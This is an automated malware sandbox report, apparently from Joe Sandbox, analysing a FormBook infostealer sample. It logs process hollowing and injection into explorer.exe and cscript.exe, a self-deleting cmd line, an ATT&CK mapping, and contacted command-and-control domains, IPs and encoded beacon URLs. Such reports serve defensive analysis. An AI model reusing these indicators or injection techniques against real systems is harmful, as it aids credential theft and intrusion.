          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 68.183.162.131 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1190000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: B8F008
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.700359971.00000000008B8000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeQueries volume information: C:\Users\user\Desktop\bXFjrxjRlb.exe VolumeInformation
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344520 Sample: bXFjrxjRlb.exe Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 33 www.getyoursofa.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 11 bXFjrxjRlb.exe 15 4 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->29 dropped 31 C:\Users\user\AppData\...\bXFjrxjRlb.exe.log, ASCII 11->31 dropped 57 Writes to foreign memory regions 11->57 59 Allocates memory in foreign processes 11->59 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->61 63 Injects a PE file into a foreign processes 11->63 15 AddInProcess32.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 2 other signatures 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 35 what3emoji.com 34.102.136.180, 49750, 80 GOOGLEUS United States 18->35 37 thehostingroad.com 68.183.162.131, 49756, 80 DIGITALOCEAN-ASNUS United States 18->37 39 5 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 cscript.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          bXFjrxjRlb.exe27%VirustotalBrowse
          bXFjrxjRlb.exe28%ReversingLabsByteCode-MSIL.Trojan.Wacatac
          bXFjrxjRlb.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.getyoursofa.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ocsp.pki.goog/gsr2020%URL Reputationsafe
          http://ocsp.pki.goog/gsr2020%URL Reputationsafe
          http://ocsp.pki.goog/gsr2020%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          https://pki.goog/repository/00%URL Reputationsafe
          https://pki.goog/repository/00%URL Reputationsafe
          https://pki.goog/repository/00%URL Reputationsafe
          http://crl.microsofB0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.inifinityapps.net/bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV0%Avira URL Cloudsafe
          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thehostingroad.com
          68.183.162.131
          truetrue
            unknown
            what3emoji.com
            34.102.136.180
            truetrue
              unknown
              www.getyoursofa.com
              162.241.30.16
              truetrueunknown
              parkingpage.namecheap.com
              198.54.117.215
              truefalse
                high
                www.thehostingroad.com
                unknown
                unknowntrue
                  unknown
                  www.akealuminum.com
                  unknown
                  unknowntrue
                    unknown
                    www.what3emoji.com
                    unknown
                    unknowntrue
                      unknown
                      www.inifinityapps.net
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xVtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.inifinityapps.net/bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xVtrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://ns.adobe.cobjbXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://pki.goog/gsr2/GTS1O1.crt0bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                      high
                                      http://ns.adobe.c/gbXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://ocsp.pki.goog/gsr202bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.goodfont.co.krexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://pki.goog/repository/0bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://crl.microsofBbXFjrxjRlb.exe, 00000000.00000003.349237983.000000000802D000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schema.org/WebPagebXFjrxjRlb.exe, 00000000.00000002.356197969.000000000254F000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.carterandcone.comlexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netDexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                            high
                                            http://ocsp.pki.goog/gts1o1core0bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.pki.goog/GTS1O1core.crl0bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fonts.comexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.sandoll.co.krexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.pki.goog/gsr2/gsr2.crl0?bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.sakkal.comexplorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://ns.ado/1bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  34.102.136.180
                                                  unknownUnited States
                                                  15169GOOGLEUStrue
                                                  68.183.162.131
                                                  unknownUnited States
                                                  14061DIGITALOCEAN-ASNUStrue
                                                  198.54.117.215
                                                  unknownUnited States
                                                  22612NAMECHEAP-NETUSfalse

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:344520
                                                  Start date:26.01.2021
                                                  Start time:16:58:12
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 19s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:bXFjrxjRlb.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:24
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@7/2@5/3
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 10.4% (good quality ratio 9.1%)
                                                  • Quality average: 71.2%
                                                  • Quality standard deviation: 33.2%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 172.217.23.36, 51.104.139.180, 95.101.22.224, 95.101.22.216, 95.101.27.142, 95.101.27.163, 52.155.217.156, 20.54.26.129, 51.103.5.186, 23.210.248.85
